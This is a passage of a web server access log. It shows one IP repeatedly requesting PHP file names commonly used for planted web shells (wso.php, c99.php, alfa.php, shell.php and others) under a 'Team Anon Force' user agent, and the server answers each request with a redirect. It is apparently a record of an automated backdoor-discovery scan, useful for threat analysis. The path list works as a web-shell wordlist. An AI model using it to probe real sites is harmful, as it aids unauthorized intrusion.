/wp-adminincludesclass-wp-media-list-data.php HTTP/1.1" 301 279 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:12 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:15 -0400] "GET /wso.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:19 -0400] "GET /doc.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:22 -0400] "GET /stindex.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:26 -0400] "GET /alwso.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:30 -0400] "GET /ups.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:33 -0400] "GET /media-admin.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:36 -0400] "GET /sym.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:40 -0400] "GET /sym403.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:45 -0400] "GET /fw.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:48 -0400] "GET /symlink.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:52 -0400] "GET /shell.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:46:56 -0400] "GET /1.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:01 -0400] "GET /data.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:05 -0400] "GET /wp-blog.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:10 -0400] "GET /b.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:14 -0400] "GET /c.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:18 -0400] "GET /shx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:22 -0400] "GET /alfa.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:25 -0400] "GET /a.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:29 -0400] "GET /old-index.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:32 -0400] "GET /FoxWSO.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:36 -0400] "GET /x.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:40 -0400] "GET /403.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:46 -0400] "GET /mini.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:50 -0400] "GET /imagesvuln.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:54 -0400] "GET /edit-form.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:47:57 -0400] "GET /wikindex.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:02 -0400] "GET /m.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:06 -0400] "GET /0byte.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:11 -0400] "GET /xx.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:15 -0400] "GET /new-index.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:18 -0400] "GET /wp.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:22 -0400] "GET /wp-wso.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:26 -0400] "GET /qindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:30 -0400] "GET /priv8.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:34 -0400] "GET /minimo.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:39 -0400] "GET /xleet.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:43 -0400] "GET /V3.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:47 -0400] "GET /V5.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:51 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:48:57 -0400] "GET /up.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:01 -0400] "GET /www.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:06 -0400] "GET /100.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:11 -0400] "GET /777.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:15 -0400] "GET /defau1t.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:20 -0400] "GET /f.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:25 -0400] "GET /xox.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:29 -0400] "GET /o.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:34 -0400] "GET /new.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:38 -0400] "GET /sindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:42 -0400] "GET /baindex.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:46 -0400] "GET /wi.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:50 -0400] "GET /mar.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:53 -0400] "GET /root.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:49:57 -0400] "GET /nee.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:01 -0400] "GET /v.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:05 -0400] "GET /z.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:09 -0400] "GET /g.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:13 -0400] "GET /c99.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:19 -0400] "GET /w.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:23 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:29 -0400] "GET /2.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:35 -0400] "GET /lol.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:40 -0400] "GET /87.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:44 -0400] "GET /7yn.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:48 -0400] "GET /haxor.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:52 -0400] "GET /13.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:55 -0400] "GET /e.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:50:59 -0400] "GET /r.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:04 -0400] "GET /t.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:08 -0400] "GET /y.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:13 -0400] "GET /u.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:17 -0400] "GET /i.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:21 -0400] "GET /p.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:24 -0400] "GET /q.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:28 -0400] "GET /s.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:31 -0400] "GET /d.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:35 -0400] "GET /h.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:39 -0400] "GET /j.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:42 -0400] "GET /k.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:46 -0400] "GET /l.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:50 -0400] "GET /n.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:54 -0400] "GET /xindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:51:58 -0400] "GET /kindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:02 -0400] "GET /FoxWSOv1.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:06 -0400] "GET /alf.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:10 -0400] "GET /bb.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:14 -0400] "GET /lf.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:18 -0400] "GET /WSO.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:21 -0400] "GET /xxx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 